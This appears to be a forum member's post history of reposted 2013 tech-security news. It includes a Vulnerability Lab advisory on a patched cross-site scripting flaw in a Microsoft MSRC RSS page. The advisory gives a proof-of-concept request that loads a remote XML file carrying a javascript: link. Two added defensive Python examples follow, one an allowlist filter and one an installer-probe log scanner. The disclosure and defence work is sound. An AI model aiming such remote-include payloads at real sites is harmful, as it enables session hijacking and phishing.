Matt
Active Members
Posts: 1773
Days Won: 6

Everything posted by Matt

  1. You've probably watched too many movies with Russians. You still haven't realized that America has the power. You'll realize it soon...
  2. Given the recent revelations about mass data slurping by the NSA, we were relieved to hear that a Chinese company has begun offering a whopping 10TB of free hosting to privacy-conscious punters. After Chinese rivals Baidu and Qihoo 360 served up a terabyte of free cloud storage to punters, rival Tencent this week floated a 10TB giveaway, reports TheNextWeb. The data bonanza requires users download an iOS or Android App, which gives them access to a terabyte of storage. As they use more data, Tencent will extend the amount of storage given away up to a whopping 10 terabytes. This compares with a piddling 15GB freebie giveaway for Google Drive, up to 18GB for Dropbox, and 7GB for Microsoft's SkyDrive. So, with that much storage, what could you actually keep in the Chinese cloud? Enter El Reg's patent-pending Ballmer scale. This 378x250 pixel image of departing Microsoft exec Steve Ballmer takes up 23,269 bytes. Under Tencent's giveaway, you could spam 472,522,080 copies of this image up into the cloud. Why stick with just one image? Steve Ballmer is 57, which adds up to some 29 million minutes, or 1,798,743,600 seconds, so if we had trained a camera on Ballmer from birth we could use Tencent to store one image for every four seconds of the venerable CEO's life to date. But what if we wanted to save not just Ballmer's likeness, but his essence? The human genome can feasibly be stored in as little as 1.5GB of data. Given that the person-to-person DNA variance is about 0.1 percent, then, the unique Steve Ballmer can be represented by around 1.53600 megabytes. Therefore, the Tencent cloud could store an impressive 6,708,739 copies of Ballmer's DNA profile. For the culture vultures among us, you could also store around half of the Library of Congress – but why would you want to do that when you could stuff Tencent with a virtual army of Steve Ballmers? ® Source TheRegister.Co.Uk
  3. Description : Microsoft Online Services suffered from a cross site scripting vulnerability. Note that this finding houses site-specific data. Author : Mohd. Shadab Siddiqui Source : Microsoft MSRC RSS ASPX Cross Site Scripting - Packet Storm
Code :

Title:
======
Microsoft MSRC RSS ASPX - CS Cross Site Web Vulnerability

Date:
=====
2013-07-28

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1026
Microsoft Security Response Center (MSRC) ID: 15180

Video: http://www.vulnerability-lab.com/get_content.php?id=1028
View: http://www.youtube.com/watch?v=wcIIFB4Gx7g

VL-ID:
=====
1026

Common Vulnerability Scoring System:
====================================
1.6

Introduction:
=============
Microsoft Online Services is Microsoft`s hosted-software offering and a component of their software plus services strategy. Microsoft Online Services are hosted by Microsoft and sold `with` Microsoft partners. The suite includes Exchange Online, SharePoint Online, Office Communications Online, Microsoft Forefront, and Microsoft Office Live Meeting. For businesses, the Software-plus-Services approach enables organizations to access the capabilities of enterprise software through on-premises servers, as online services, or a combination of both, depending on specific business requirements. Services also provide the option to add complementary capabilities that enhance on-premises server software and simplify system management and maintenance.

(Copy of the vendor Homepage: https://microsoftonline.com )

Abstract:
=========
An independent vulnerability laboratory researcher discovered a client-side cross site scripting vulnerability on Microsoft Website Application.

Report-Timeline:
================
2013-07-18: Researcher Notification & Coordination (Muhammad A.S.)
2013-07-19: Vendor Notification (Microsoft Security Response Center - MSRC)
2013-07-20: Vendor Response/Feedback (Microsoft Security Response Center - MSRC)
2013-07-26: Vendor Fix/Patch (Microsoft Development Team)
2013-07-28: Public Disclosure (Vulnerability Laboratory)

Status:
========
Published

Affected Products:
==================
Microsoft Corporation
Product: Security Response Center (MSRC) - Blog aspx Web Application 2013 Q2

Exploitation-Technique:
=======================
Remote

Severity:
=========
Low

Details:
========
It has been discovered that the file `rssfeedgenerator.aspx` is not validating the input parameters and hence is vulnerable to remote xss attacks. Since no validation is being performed, it is possible to include remote xml files to be parsed and displayed on the main microsoft website. A remote attacker can include malicious xml files via URLS variable which can lead to remote java-script execution on the client machine within the context of microsoft.com website.

The vulnerability is located in the 'rssfeedgenerator.aspx' file and the vulnerable parameter is 'URLs' which can be exploited via GET method to include remote (external) xml files. Exploitation of the vulnerability requires no privilege application user account but low or medium user interaction.

Successful exploitation of the vulnerability results in session hijacking, non persistent phishing, non persistent malware injects, external redirects and manipulation of affected module or application context.

Vulnerable Module(s):
[+] RSS Feeds

Vulnerable Path:
[+] /security/msrc/rssfeedgenerator.aspx

Vulnerable File(s):
[+] rssfeedgenerator.aspx

Vulnerable Parameter(s):
[+] URLs

Proof of Concept:
=================
The client side web vulnerability can be exploited by remote attackers without privilege application user account and with low user interaction.
For demonstration or reproduce ...

GET /security/msrc/rssfeedgenerator.aspx?URLs=http://www.nybbletech.com/poc/ms/micro.xml&itemToDisplay=3&words=16 HTTP/1.1
Host: www.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: v1st=58D7FEA59B237B40; MC1=GUID=376046a1d44f8b42834ba1809be0406d&HASH=a146&LV=20136 &V=4&LU=1371688854677; A=I&I=AxUFAAAAAACVBwAA4cYlXvROT/4qjCG/tr9eRg!!&V=4; WT_FPC=id=3513600256.30305614:lv=1373527230788:ss=1373527206515
Connection: keep-alive

Response:
INT NAV ONL PHY PRE PUR UNI"
X-AspNet-Version: 2.0.50727
VTag: 279923242400000000
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
Date: Fri, 19 Jul 2013 14:44:14 GMT
Content-Length: 1847

<div id="rssData1"><div><table width="100%" cellspacing="0" cellpadding="0" border="0" > <tr><td><a href="http://blogs.technet.com/b/srd/archive/2013/07/10/running-in-the-wild-not-for-so-long.aspx" target="_blank"> <b>Running in the wild, not for so long</b></a></td></tr><tr><td style="padding-bottom:2px;"><font size="1"> <i>Security Research & Defense - Wednesday, July 10, 2013 5:12:00 PM</i></font></td></tr><tr><td style="padding-bottom:10px;"> Over <a href="javascript:alert('VULNERABLE')">CLICK HERE</a>testinging we received a report from our partners about a possible unpatched Internet Explorer vulnerability ......</td></tr></table></div><div><table width="100%" cellspacing="0" cellpadding="0" border="0" ><tr><td><a href="http://blogs.technet.com/b/srd/archive/2013/07/09/assessing-risk-for-the-july-2013-security-updates.aspx" target="_blank"><b>Assessing risk for the July 2013 security updates</b></a></td></tr><tr><td style="padding-bottom:2px;"><font size="1"> <i>Security Research & Defense - Tuesday, July 9, 2013 10:09:00 AM</i></font></td></tr><tr><td style="padding-bottom:10px;">Today we released seven security bulletins addressing 34 CVE’s. Six bulletins have a maximum severity rating of Critical, ...... </td></tr></table></div><div><table width="100%" cellspacing="0" cellpadding="0" border="0" ><tr><td> <a href="http://blogs.technet.com/b/srd/archive/2013/06/17/emet-4-0-now-available-for-download.aspx" target="_blank"> <b>EMET 4.0 now available for download</b></a></td></tr><tr><td style="padding-bottom:2px;"><font size="1"><i>Security Research & Defense - Monday, June 17, 2013 10:01:00 AM</i></font></td></tr><tr><td style="padding-bottom:10px;">We are pleased to announce that <strong>the final release of version 4.0 of the Enhanced Mitigation Experience Toolkit</strong>, ......</td></tr></table></div></div>

Solution:
=========
Input data via URLS parameter should be validated. Only white-listed domains should be allowed for redirects and direct links.

Risk:
=====
The security risk of the client side cross site scripting vulnerability in the microsoft security web application is estimated as low(+)|(-)medium.

Credits:
========
Muhammad Ahmed Siddiqui - ahmed@nybbletech.com

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
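The advisory's Solution section says the URLs parameter should be validated against an allowlist. The following is an added example, not code from the advisory, from Microsoft or from Vulnerability Lab: a hypothetical Python feed proxy that applies two defences the advisory implies. First, `is_allowed_feed_url` accepts only http(s) URLs whose host matches an allowlist exactly (no userinfo, no IP literals, no port override, no suffix or substring matching), which is what stops an arbitrary external XML file from being pulled in. Second, `render_items` HTML-escapes every value taken from the feed and reduces non-http(s) links to `#`, so a feed item carrying a `javascript:` link like the one in the proof of concept is rendered inert even if the allowlist is ever misconfigured. `ALLOWED_FEED_HOSTS`, `generate`, the injected `fetch` callable and the sample feed are all constructed for this example.

```python
"""Allowlist plus output-encoding for a server-side RSS feed proxy.

Added example (not from the advisory or the vendor). A hypothetical
`generate(feed_url, fetch)` stands in for a URLs= parameter handler.
"""
import html
import ipaddress
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Hypothetical allowlist of feed hosts this endpoint may proxy (assumption).
ALLOWED_FEED_HOSTS = {"blogs.technet.com", "www.microsoft.com"}


def is_allowed_feed_url(url: str) -> bool:
    """True only for http(s) URLs whose host is exactly on the allowlist."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme not in ("http", "https"):
        return False
    # user@host forms let the allowlisted name appear before the real host.
    if parts.username is not None or parts.password is not None:
        return False
    host = parts.hostname
    if not host:
        return False
    try:
        ipaddress.ip_address(host)
        return False  # raw IP literal is never allowlisted
    except ValueError:
        pass
    try:
        if parts.port is not None:  # raises ValueError on a malformed port
            return False
    except ValueError:
        return False
    return host.lower() in ALLOWED_FEED_HOSTS


def safe_href(link: str) -> str:
    """Keep only absolute http(s) links from feed content; else return '#'."""
    link = link.strip()
    parts = urlsplit(link)
    if parts.scheme in ("http", "https") and parts.netloc:
        return html.escape(link, quote=True)
    return "#"


def render_items(feed_xml: str, max_items: int = 3) -> str:
    """Parse an RSS document and render items with every field escaped."""
    root = ET.fromstring(feed_xml)
    rows = []
    for item in list(root.iter("item"))[:max_items]:
        title = html.escape(item.findtext("title", default=""), quote=True)
        link = safe_href(item.findtext("link", default=""))
        desc = html.escape(item.findtext("description", default=""), quote=True)
        rows.append(f'<tr><td><a href="{link}">{title}</a><br>{desc}</td></tr>')
    return "<table>" + "".join(rows) + "</table>"


def generate(feed_url: str, fetch) -> str:
    """Refuse any feed URL off the allowlist before fetching or rendering it.

    `fetch` is a callable returning feed text, injected so this runs offline.
    """
    if not is_allowed_feed_url(feed_url):
        raise ValueError("feed URL not on allowlist")
    return render_items(fetch(feed_url))


# Constructed sample feed: one benign item and one whose link and
# description carry script, as an attacker-controlled feed would.
SAMPLE_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>sample</title>
<item><title>Benign post</title><link>https://blogs.technet.com/b/srd/post.aspx</link>
<description>Plain text</description></item>
<item><title>&lt;b&gt;Click&lt;/b&gt;</title><link>javascript:alert('x')</link>
<description>&lt;script&gt;alert(1)&lt;/script&gt;</description></item>
</channel></rss>"""

if __name__ == "__main__":
    print(generate("https://blogs.technet.com/feed", lambda _u: SAMPLE_FEED))
```

The host check is exact-match on purpose: prefix, suffix or substring matching on the hostname is the usual way an allowlist of this kind gets bypassed, and the escaping step means the page's safety does not rest on the allowlist alone.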
  4. SDN (software-defined networking) promises some real benefits for people who use networks, but to the engineers who manage them, it may represent the end of an era. Ever since Cisco made its first routers in the 1980s, most network engineers have relied on a CLI (command-line interface) to configure, manage and troubleshoot everything from small-office LANs to wide-area carrier networks. Cisco's isn't the only CLI, but on the strength of the company's domination of networking, it has become a de facto standard in the industry, closely emulated by other vendors. As such, it's been a ticket to career advancement for countless network experts, especially those certified as CCNAs (Cisco Certified Network Associates). Those network management experts, along with higher level CCIEs (Cisco Certified Internetwork Experts) and holders of other official Cisco credentials, make up a trained workforce of more than 2 million, according to the company. A CLI is simply a way to interact with software by typing in lines of commands, as PC users did in the days of DOS. With the Cisco CLI and those that followed in its footsteps, engineers typically set up and manage networks by issuing commands to individual pieces of gear, such as routers and switches. SDN, and the broader trend of network automation, uses a higher layer of software to control networks in a more abstract way. Whether through OpenFlow, Cisco's ONE (Open Network Environment) architecture, or other frameworks, the new systems separate the so-called control plane of the network from the forwarding plane, which is made up of the equipment that pushes packets. Engineers managing the network interact with applications, not ports. "The network used to be programmed through what we call CLIs, or command-line interfaces. We're now changing that to create programmatic interfaces," Cisco Chief Strategy Officer Padmasree Warrior said at a press event earlier this year. 
Will SDN spell doom for the tool that network engineers have used throughout their careers? "If done properly, yes, it should kill the CLI. Which scares the living daylights out of the vast majority of CCIEs," Gartner analyst Joe Skorupa said. "Certainly all of those who define their worth in their job as around the fact that they understand the most obscure Cisco CLI commands for configuring some corner-case BGP4 (Border Gateway Protocol 4) parameter." At some of the enterprises that Gartner talks to, the backlash from some network engineers has already begun, according to Skorupa. "We're already seeing that group of CCIEs doing everything they can to try and prevent SDN from being deployed in their companies," Skorupa said. Some companies have deliberately left such employees out of their evaluations of SDN, he said. Not everyone thinks the CLI's days are numbered. SDN doesn't go deep enough to analyze and fix every flaw in a network, said Alan Mimms, a senior architect at F5 Networks. "It's not obsolete by any definition," Mimms said. He compared SDN to driving a car and CLI to getting under the hood and working on it. For example, for any given set of ACLs (access control lists) there are almost always problems for some applications that surface only after the ACLs have been configured and used, he said. A network engineer will still have to use CLI to diagnose and solve those problems. However, SDN will cut into the use of CLI for more routine tasks, Mimms said. Network engineers who know only CLI will end up like manual laborers whose jobs are replaced by automation. It's likely that some network jobs will be eliminated, he said. This isn't the first time an alternative has risen up to challenge the CLI, said Walter Miron, a director of technology strategy at Canadian service provider Telus. There have been graphical user interfaces to manage networks for years, he said, though they haven't always had a warm welcome. 
"Engineers will always gravitate toward a CLI when it's available," Miron said. Even networking startups need to offer a Cisco CLI so their customers' engineers will know how to manage their products, said Carl Moberg, vice president of technology at Tail-F Systems. Since 2005, Tail-F has been one of the companies going up against the prevailing order. It started by introducing ConfD, a graphical tool for configuring network devices, which Cisco and other major vendors included with their gear, according to Moberg. Later the company added NCS (Network Control System), a software platform for managing the network as a whole. To maintain interoperability, NCS has interfaces to Cisco's CLI and other vendors' management systems. CLIs have their roots in the very foundations of the Internet, according to Moberg. The approach of the Internet Engineering Task Force, which oversees IP (Internet Protocol) has always been to find pragmatic solutions to defined problems, he said. This detailed-oriented "bottom up" orientation was different from the way cellular networks were designed. The 3GPP, which developed the GSM standard used by most cell carriers, crafted its entire architecture at once, he said. The IETF's approach lent itself to manual, device-by-device administration, Moberg said. But as networks got more complex, that technique ran into limitations. Changes to networks are now more frequent and complex, so there's more room for human error and the cost of mistakes is higher, he said. "Even the most hardcore Cisco engineers are sick and tired of typing the same commands over and over again and failing every 50th time," Moberg said. Though the CLI will live on, it will become a specialist tool for debugging in extreme situations, he said. "There'll always be some level of CLI," said Bill Hanna, vice president of technical services at University of Pittsburgh Medical Center. 
At the launch earlier this year of Nuage Networks' SDN system, called Virtualized Services Platform, Hanna said he hoped SDN would replace the CLI. The number of lines of code involved in a system like VSP is "scary," he said. On a network fabric with 100,000 ports, it would take all day just to scroll through a list of the ports, said Vijay Gill, a general manager at Microsoft, on a panel discussion at the GigaOm Structure conference earlier this year. "The scale of systems is becoming so large that you can't actually do anything by hand," Gill said. Instead, administrators now have to operate on software code that then expands out to give commands to those ports, he said. Faced with these changes, most network administrators will fall into three groups, Gartner's Skorupa said. The first group will "get it" and welcome not having to troubleshoot routers in the middle of the night. They would rather work with other IT and business managers to address broader enterprise issues, Skorupa said. The second group won't be ready at first but will advance their skills and eventually find a place in the new landscape. The third group will never get it, Skorupa said. They'll face the same fate as telecommunications administrators who relied for their jobs on knowing obscure commands on TDM (time-division multiplexing) phone systems, he said. Those engineers got cut out when circuit-switched voice shifted over to VoIP (voice over Internet Protocol) and went onto the LAN. "All of that knowledge that you had amassed over decades of employment got written to zero," Skorupa said. For IP network engineers who resist change, there will be a cruel irony: "SDN will do to them what they did to the guys who managed the old TDM voice systems." But SDN won't spell job losses, at least not for those CLI jockeys who are willing to broaden their horizons, said analyst Zeus Kerravala of ZK Research. 
"The role of the network engineer, I don't think, has ever been more important," Kerravala said. "Cloud computing and mobile computing are network-centric compute models." Data centers may require just as many people, but with virtualization, the sharply defined roles of network, server and storage engineer are blurring, he said. Each will have to understand the increasingly interdependent parts. The first step in keeping ahead of the curve, observers say, may be to learn programming. "The people who used to use CLI will have to learn scripting and maybe higher-level languages to program the network, or at least to optimize the network," said Pascale Vicat-Blanc, founder and CEO of application-defined networking startup Lyatiss, during the Structure panel. Microsoft's Gill suggested network engineers learn languages such as Python, C# and PowerShell. For Facebook, which takes a more hands-on approach to its infrastructure than do most enterprises, that future is now. "If you look at the Facebook network engineering team, pretty much everybody's writing code as well," said Najam Ahmad, Facebook's director of technical operations for infrastructure. Network engineers historically have used CLIs because that's all they were given, Ahmad said. "I think we're underestimating their ability. " Cisco is now gearing up to help its certified workforce meet the newly emerging requirements, said Tejas Vashi, director of product management for Learning@Cisco, which oversees education, testing and certification of Cisco engineers. With software automation, the CLI won't go away, but many network functions will be carried out through applications rather than manual configuration, Vashi said. As a result, network designers, network engineers and support engineers all will see their jobs change, and there will be a new role added to the mix, he said. 
In the new world, network designers will determine network requirements and how to fulfill them, then use that knowledge to define the specifications for network applications. Writing those applications will fall to a new type of network staffer, which Learning@Cisco calls the software automation developer. These developers will have background knowledge about networking along with skills in common programming languages such as Java, Python, and C, said product manager Antonella Como. After the software is written, network engineers and support engineers will install and troubleshoot it. "All these people need to somewhat evolve their skills," Vashi said. Cisco plans to introduce a new certification involving software automation, but it hasn't announced when. Despite the changes brewing in networks and jobs, the larger lessons of all those years typing in commands will still pay off for those who can evolve beyond the CLI, Vashi and others said. "You've got to understand the fundamentals," Vashi said. "If you don't know how the network infrastructure works, you could have all the background in software automation, and you don't know what you're doing on the network side." Stephen Lawson covers mobile, storage and networking technologies for The IDG News Service. Follow Stephen on Twitter at @sdlawsonmedia. Stephen's e-mail address is stephen_lawson@idg.com Source ComputerWorld.Com
  5. The number of active connections to the anonymous Tor web tool doubled to 1.2 million in August. The figure was revealed on the Tor Metrics Portal, which showed a marked spike in the number of Tor connections, which usually averages around 550,000. Tor's Roger Dingledine has issued a statement confirming the figure, adding that the reason for the increase remains unknown. "The number of Tor clients running appears to have doubled since August 19 and it's not just a fluke in the metrics data – it appears that there really are twice as many Tor clients running as before," he wrote. "There's a slight increase (worsening) in the performance measurements, but it's hard to say if that's a real difference. So while there are a bunch of new Tor clients running, it would seem they're not doing much. Anybody know details? It's easy to speculate (Pirate Browser publicity gone overboard? People finally reading about the NSA thing? Botnet?) But some good solid facts would sure be useful." Members of the Tor community have since mirrored Dingledine's surprise. One Tor community member posting under the name Mick suggested that the increase could be due to the recently launched PirateBay's PirateBrowser. "I suspect PirateBrowser, given that PirateBay users probably outnumber privacy lovers by two-to-three orders of magnitude," he wrote. The PirateBrowser was launched by the PirateBay in August and is designed to let users get around internet service providers' (ISPs) online blockades. The browser is a preconfigured bundle for the Firefox Tor client (Vidalia), though it doesn't offer the same web anonymity as the regular Tor Browser. Others, like community member Grarpamp, have been more suspicious, arguing that it is the result of a botnet or explorative cyber attack. "Too big a double in under a week for me to believe it's natural growth based on news or some promo somewhere. I'd guess it got included in some app. A botnet fits perfect. 
Or it's some sort of analysis, attack or flood," wrote Grarpamp. Tor is a free service designed to let people surf the internet anonymously by directing internet traffic through a volunteer network of more than 3,000 relays to conceal the user's location. The process was previously believed to make web users untrackable, however earlier in August reports broke claiming the FBI has found a way to track people using the Tor Browser. Since the reports broke, an exploit purporting to be the one used by the FBI has appeared on the Metasploit penetration testing forum. Source V3.CO.UK
  6. Security expert Bruce Schneier has attacked the NSA over its treatment of former anonymous email service provider Lavabit, claiming the agency has "commandeered the internet". Schneier attacked the NSA for its behaviour in a public blog post, arguing that it is using laws to forcibly turn tech companies into mass surveillance tools. "If there's any confirmation that the US government has commandeered the internet for worldwide surveillance, it is what happened with Lavabit earlier this month," he wrote. The renowned cryptographer said the NSA's treatment of Lavabit's founder Ladar Levison after he chose to shut down the service in a bid to protect his customers from the agency, is proof it is going too far in its efforts to monitor the internet. "So far, we just have an extreme moral act in the face of government pressure. It's what happened next that is the most chilling. The government threatened him with arrest, arguing that shutting down this email service was a violation of the order," he wrote. Schneier said the threat of arrest shows the US government's behaviour proves it believes it has sovereignty over private industry. "There it is. If you run a business, and the FBI or NSA want to turn it into a mass surveillance tool, they believe they can do so, solely on their own initiative. They can force you to modify your system. They can do it all in secret and then force your business to keep that secret. Once they do that, you no longer control that part of your business," he wrote. "You can't shut it down. You can't terminate part of your service. In a very real sense, it is not your business anymore. It is an arm of the vast US surveillance apparatus, and if your interest conflicts with theirs then they win. Your business has been commandeered." 
He added that while it is unclear if law enforcement would actually be able to make good on its threats to arrest non-compliant businesses, the very fact the NSA made the threat proves the need for legislative change. "Protection rackets are easier when you have the law backing you up. As the Snowden whistleblowing documents continue to be made public, we're getting further glimpses into the surveillance state that has been secretly growing around us," he wrote. "The collusion of corporate and government surveillance interests is a big part of this, but so is the government's resorting to intimidation. Every Lavabit-like service that shuts down – and there have been several – gives us consumers less choice, and pushes us into the large services that co-operate with the NSA. It's past time we demanded that Congress repeal National Security Letters, give us privacy rights in this new information age, and force meaningful oversight on this rogue agency." Schneier is one of many members of the security community to call for change following the PRISM revelation and Lavabit shutdown. Silent Circle chief executive Mike Janke made a similar claim after shutting down the company's own secure email service. Source V3.CO.UK
  7. Congratulations on the tool you built. If every VIP made a tool of such "calibre" ...
  8. Security researchers have published a research paper explaining how they bypassed the security features of the cloud-based storage service Dropbox and gained access to users' private files. Dhiru Kholia of Openwall and Przemyslaw Wegrzyn of CodePainters stated that, although the service has over 100 million users, the platform had not, until now, been extensively analysed from a security standpoint. They explained that their goal is to get Dropbox to create an open-source version, which would mean that anyone could analyse the code and verify whether the service is secure. The researchers revealed that they managed to gain unauthorized access to files, despite the fact that Dropbox added security features after it was attacked a year earlier. The security measures aimed at attracting enterprise users included encryption and two-factor authentication, but both were bypassed by Kholia and Wegrzyn. They managed to reverse the portion of Dropbox that runs on the user's computer, despite the fact that Dropbox was written in Python using techniques to prevent reverse engineering. This means that many other cloud services that use Python and the same anti-hacking techniques could be at risk, Business Insider reported. The researchers discovered that two-factor authentication, such as that used by Dropbox, only protects against unauthorized access to the Dropbox website. "Dropbox's internal client API does not support and does not use two-factor authentication. This means that possessing only the host_id value is enough to gain access to the targeted data stored in Dropbox," the researchers explained. However, Dropbox stated that it does not believe the research presents a vulnerability in the Dropbox client.
"In the case presented in the research, the user's computer would first have to be compromised in a way that would affect the entire computer, not just the user's Dropbox," the company said. Kholia and Wegrzyn hope they will get help building a more secure, open-source method for using Dropbox, which Dropbox could adopt. Source : ComputerWeekly.com | Information Technology (IT) News, UK IT Jobs, Industry News
  9. Following through on an order earlier this year from President Obama, the National Institute of Standards and Technology (NIST) is rapidly developing a set of guidelines and best practices to help organizations better secure their IT systems. The agency released a draft of its preliminary cybersecurity framework and is seeking feedback from industry. The agency is scheduled to release a full preliminary draft in October, for public review. It will then issue the final 1.0 version of the framework in February and continue to update the framework thereafter. When finished, the framework will provide guidance for organizations on how to manage cybersecurity risk, "in a manner similar to financial, safety, and operational risk," the document states. In February the White House issued an executive order tasking NIST to develop a cybersecurity framework, one based on existing standards, practices and procedures that have proven to be effective. In July, NIST issued an outline of the framework and held a workshop in San Diego to fill in some details. This draft incorporates some of that work, and was released to gather more feedback ahead of the next workshop, to be held in Dallas starting on Sept. 11. "The Framework complements, and does not replace, an organization's existing business or cybersecurity risk management process and cybersecurity program. Rather, the organization can use its current processes and leverage the framework to identify opportunities to improve an organization's cybersecurity risk management," the draft read. When finished, the framework will consist of three parts. One component, called the core functions, will be a compilation of commonly practiced activities and references. The second component, the implementation tiers, provides guidance on how to manage cybersecurity risks. The third component, the framework profile, provides guidance on how to integrate the core functions within a cybersecurity risk strategy, or plan. 
On Twitter, framework ideas are being submitted and discussed with the hashtag #NISTCSF. Joab Jackson covers enterprise software and general technology breaking news for The IDG News Service. Follow Joab on Twitter at @Joab_Jackson. Joab's e-mail address is Joab_Jackson@idg.com Source ComputerWorld.Com
  10. The developers of the popular vBulletin commercial Internet forum software are investigating a potential exploit and advised users to delete the "install" directory from their deployments as a precaution. "A potential exploit vector has been found in the vBulletin 4.1+ and 5+ installation directories," Wayne Luke, technical support lead at vBulletin Solutions, the company that develops the software, announced this week on the vBulletin community forum. "Our developers are investigating this issue at this time. If deemed necessary we will release the necessary patches." Luke advised users to delete the 'install' directory from their vBulletin installations in order to mitigate the issue that hasn't yet been disclosed. The directory that should be deleted is "/install" for vBulletin 4.1.x versions and "/core/install" for the 5.x versions. This directory normally contains the scripts and files used during the original installation process and subsequent upgrades. In the "Cleaning up after Install" section of the vBulletin manual users are advised to delete all files and subdirectories from the "install" directory as a security precaution. However, they are not advised to delete the directory itself. It's not clear what the exploit currently being investigated would allow potential attackers to do, but the fact that it prompted an advance warning from the developers suggests that it might have serious implications. Luke declined to disclose information about the nature of the exploit. "I am sorry but in the interest of security for our customers, we can not discuss this issue at this time," he said Thursday via email. "Going back to our logs, we don't see any specific scans for /core/install, but we see constant discovery requests for /install," said Daniel Cid, chief security officer at Sucuri, a company that provides website security monitoring and malware clean-up services, in a blog post. 
"We don't yet know if that is related to vBulletin or other CMSs [content management systems]." Attackers are constantly trying to exploit vulnerabilities in popular content management systems in order to break into websites, and while vBulletin does not power as many websites as WordPress, Joomla or some other general-purpose CMS software, it is one of the most popular applications for setting up Internet discussion forums. According to vBulletin Solutions, over 100,000 community websites are running on vBulletin, including some operated by Zynga, Electronic Arts, Sony Pictures, NASA, Valve Corporation and other well known companies. In July, hackers broke into UbuntuForums.org, a community website for the Ubuntu Linux distribution with over 1.8 million registered accounts, and managed to access information about users, including email addresses and password hashes. The site was using vBulletin. "In summary, the root cause was a combination of a compromised individual account and the configuration settings in vBulletin, the Forums application software," Canonical, the company that operates the site, said in a blog post following the incident. Source ComputerWorld.com
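Two checks follow naturally from the post above: is the installer directory still on disk, and is anyone already probing for it, as Sucuri's logs show. The Python below is an added example, not code from vBulletin, Sucuri or the article. The access-log lines are constructed for illustration (addresses from documentation ranges), and the Apache "combined" log format is an assumption about what the forum's web server writes; the path regex encodes only the two locations the post names, /install for 4.1.x and /core/install for 5.x.

```python
import os
import re
from collections import Counter
from urllib.parse import urlsplit

# vBulletin 4.1.x keeps its installer under /install, 5.x under /core/install.
INSTALL_DIRS = ("install", "core/install")
INSTALL_RE = re.compile(r"^/(?:core/)?install(?:/|$)", re.IGNORECASE)

# Apache "combined" log format is assumed; adjust LOG_RE for nginx or IIS.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)

# Constructed sample traffic (not real log data): one host sweeps both
# installer paths and then fetches a script from one that is still present.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Aug/2013:10:01:02 +0000] "GET /install/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Aug/2013:10:01:03 +0000] "GET /core/install/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.7 - - [30/Aug/2013:10:02:10 +0000] "GET /forum.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Aug/2013:10:02:11 +0000] "GET /install/upgrade.php?step=1 HTTP/1.1" 200 1337 "-" "curl/7.30"
198.51.100.7 - - [30/Aug/2013:10:03:00 +0000] "GET /installer-guide.html HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one combined-format line into its fields; None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = urlsplit(rec["target"]).path   # drop the query string
    rec["status"] = int(rec["status"])
    return rec


def scan_log(text):
    """Every request that touched an installer path, tagged by what it got back.

    A 4xx/5xx answer means someone is looking (a probe); anything below 400
    means the directory is still being served and the mitigation is not done.
    """
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or not INSTALL_RE.match(rec["path"]):
            continue
        rec["severity"] = "reachable" if rec["status"] < 400 else "probe"
        hits.append(rec)
    return hits


def probes_by_ip(hits):
    """How many installer-path requests each client made."""
    return Counter(h["ip"] for h in hits)


def leftover_install_dirs(docroot):
    """Installer directories that still exist under the document root."""
    return [d for d in INSTALL_DIRS if os.path.isdir(os.path.join(docroot, d))]


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h['severity']:9} {h['ip']:14} {h['status']} {h['path']}")
    print("requests per client:", dict(probes_by_ip(scan_log(SAMPLE_LOG))))
    print("leftover dirs under /var/www/forum:", leftover_install_dirs("/var/www/forum"))
```

Run it against the real access log and the real document root; a "reachable" hit is the one to act on first, since it means the directory the vendor asked you to delete is still answering requests.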
